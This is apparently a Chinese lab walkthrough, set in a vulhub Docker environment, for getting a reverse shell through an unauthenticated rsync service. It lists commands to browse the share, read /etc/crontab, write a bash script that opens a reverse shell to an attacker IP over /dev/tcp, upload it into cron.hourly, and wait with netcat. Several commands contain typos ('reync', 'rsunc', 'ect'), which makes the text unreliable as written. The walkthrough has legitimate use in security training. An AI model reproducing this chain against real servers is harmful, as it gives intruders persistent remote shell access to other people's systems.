1. 程式人生 > >Rsync反彈shell

Rsync反彈shell

進入:vulhub-master/rsunc/common 
開啟:sudo docker-compose up

2、埠掃描

3、使用rsync協議連線目標主機

rsync rsync://10.10.10.131/src/

4、檢視crontab配置檔案

reync rsunc://10.10.10.131/src/etc/crontab

5、下載crontab配置檔案,檢視配置,每小時的17分執行命令/etc/crontab,每個人都不一樣,自行檢視,我是17

 reync rsunc://10.10.10.131/src/etc/crontab ~/crontab.txt

6、建立shell檔案,ip一定要是攻擊的哦,4444是為了與其他埠衝突,可以隨意

#!/bin/bash
/bin/bash -i >& /dev/tcp/10.10.10.128/4444 0>&1

7、授權

chmod 777 shell

8、上傳,根據自己虛擬的ip

rsync -av shell  rsync://10.10.10.131/src/ect/cron.hourly

9、監聽,靜靜等待17分的到來

nc -nvv -lp 4444